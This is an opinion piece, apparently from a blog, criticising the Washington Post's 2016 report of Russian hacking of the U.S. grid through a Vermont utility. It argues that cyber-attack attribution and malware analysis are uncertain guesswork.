On December 30th, 2016, The Washington Post led with this ominous front page headline: “Russian hackers penetrated U.S. electricity grid through a utility in Vermont, U.S. officials say.” Not only did the story spark a wave of fear and apprehension among Americans, but it also prompted an avalanche of outrage and expenditure by an untold number of local, state and federal agencies.”
The Post’s story was captivating and bone-chilling, if only it were true. Because as it turns out, the narrative was absolutely false.
It was a quite remarkable mea culpa and merits thoughtful deconstruction.
Here’s is an excerpt:
The Vermont utility has now fessed-up that the sole evidence of Russian hacking of the U.S. energy grid is the laptop of a utility employee that contained malware that has previously been associated with Russian hackers. But there is still more to this developing story.
First off, as many have pointed out, the Vermont malware in question is actually available for purchase online, hardly an inculpatory indicator of compromise of Russian involvement. Malware can come from anywhere and its mere presence does not necessarily indicate that Russian government hackers launched a coordinated hacking campaign to penetrate that machine – the infection could have come from something as simple as the employee using his or her computer to visit one of the millions of infected websites currently live and accessible with a simple mouse-click.
Consider also the Nebulous definition of malware, the tools or criminal programs used to penetrate and takeover computer systems. In the context of a cyber-attack, malware means any sort of program or file that attackers use to infiltrate a computer system. Like legitimate hardware tools, such as a screwdriver, which a burglar uses to gain unlawful entry into a company’s headquarters, legitimate software tools can masquerade as malware.
During Russian and other state sponsored cyber-attacks such as an Advanced Persistent Threat or APT attack, intruders use stealthy, sophisticated, targeted and relentless techniques, employing a carefully crafted and evolving reconnaissance – a low-and-slow approach that is difficult to detect.
Merely identifying APT malware can be tricky, let alone determining the motive and success-rate of the attacker orchestrating the intrusion. For instance, APT attackers will also often use large data container programs for transporting exfiltrated information, yet those same data container programs have a broad range of legitimate uses – this is one way hackers hide their weaponry in plain sight.
Even if investigators can triangulate a common modus operandi among attackers, attributing a group of attack vectors to the same culprit is always speculative. The entire criminal design could all be a ruse, where one country’s cyber gang coopts the techniques of another country’s cyber gang, to confuse or disassemble.
Drawing conclusions by correlating a library of hacking techniques and targets of known cyber-attackers can provide worthwhile intelligence fodder for U.S. government investigative teams and policy-makers. However, pinpointing attribution to, and ascertaining the motives of, cyber-attackers is inherently subjective.
An online intruder can leave behind a digital crime scene akin to a ransacked home; seemingly untouched and immaculate; or somewhere in-between. Reverse engineering hacking malware is both an art and a science, and forensic investigators, incident responders, security engineers and IT administrators employ an extensive array of practical skills to pinpoint malware that targets, accesses or otherwise infects a company’s technological infrastructure.
Above all else, the most important lesson learned for both the Washington Post and the Governor of Vermont: Data Breach response and malware reverse engineering all boils down to an elaborate, albeit intelligent, guessing game – where the guesses can be wrong.